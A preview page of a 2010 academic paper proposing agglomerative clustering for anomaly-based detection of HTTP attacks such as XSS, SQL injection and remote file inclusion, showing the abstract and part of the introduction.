Clustering Toward Detecting Cyber Attacks

Clustering Toward Detecting Cyber Attacks - 2010...

Info iconThis preview shows pages 1–2. Sign up to view the full content.

View Full Document Right Arrow Icon
Clustering Toward Detecting Cyber Attacks Xiaofeng Yang, Wei Li, Mingming Sun, Xuelei Hu, Shuqin Li School of Computer Science and Technology Nanjing University of Science and Technology Nanjing, China Yongzhi Li Department of Information and Computer Science Nanjing Forestry University Nanjing, China E-mail: yzli@njfu.com.cn Abstract —several anomaly methods have been proposed to cope with the recent booming of HTTP-related vulnerabilities which renders the security breaches of lots of vital HTTP- based services on the internet. This paper proposes a novel bottom-up agglomerative clustering method which not only spares the nuisance of a learning process that involves a big amount of manual sample taggings, but also presents a much stronger adaptiveness in being able to coping with variant situations and in detecting new samples. Keywords: agglomerative clustering; intrusion detection; HTTP attacks; data minning; I. INTRODUCTION The Hypertext Transfer Protocol (HTTP)[3] has been much more widely used in recent years. More applications are designed to run as a web service and deployed across the internet, which wires HTTP as its standard communication protocol. For example, news publishing, bank transaction, email processing, file transferring, etc. The thriving trend of web service and its popularity ensures a heavier dependency of people on HTTP-based web applications to conduct carry out their business. The popularity of HTTP applications is a big motive for attackers to exploit HTTP related vulnerabilities. Latest released CVE vulnerability trends[1] points out that three typical HTTP-related attacks, namely Cross Site Scripting(XSS), SQL-injection and Remote File Inclusion(RFI) amount for more than half of the totally reported vulnerabilities. As the report also pointed out, it was mainly due to the ease of probing and exploitation of web vulnerabilities, combined with the proliferation of web service applications developed by inexperienced coders. To detect attacks, traditional Intrusion Detection System (IDS) has since long been used as a key security instrument. It is configured with a big number of signatures to detect known attacks. The sharp increase of the vulnerabilities instantly propels the number of IDS signatures, as the case with Snort[2], which renders the higher detecting consumption and lower network throughput. The dilemma was partly solved by anomaly detection, which builds normal behavior patterns rather than modeling every known attack. However, performance of anomaly methods depends heavily on how complete the samples collected represent and 1 Correspondence Authors: Xiaofeng. YANG yangxf.nj@gmail.com; Yongzhi. LI yzli@njfu.com.cn the accuracy of human taggings. Furthermore, one model learned from a given sample set applies only to very limitted detecting situations. In this paper, we propose a bottom-up agglomerative
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
Image of page 2
This is the end of the preview. Sign up to access the rest of the document.

Page1 / 5

Clustering Toward Detecting Cyber Attacks - 2010...

This preview shows document pages 1 - 2. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online